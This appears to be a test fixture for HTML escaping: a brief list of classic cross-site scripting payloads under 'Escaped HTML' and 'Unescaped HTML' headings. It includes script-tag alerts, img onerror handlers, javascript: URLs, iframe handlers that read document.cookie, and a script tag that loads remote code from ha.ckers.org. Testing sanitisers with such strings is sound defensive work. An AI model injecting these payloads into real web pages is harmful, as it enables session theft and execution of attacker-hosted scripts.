<script>alert('hihihihih');</script>
Escaped HTML:
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Unescaped HTML:
<img src="." onerror=alert(document.cookie)>,
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
</script>,
<img src="" onerror=alert("A & B")>,
<script>alert('&');</script>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>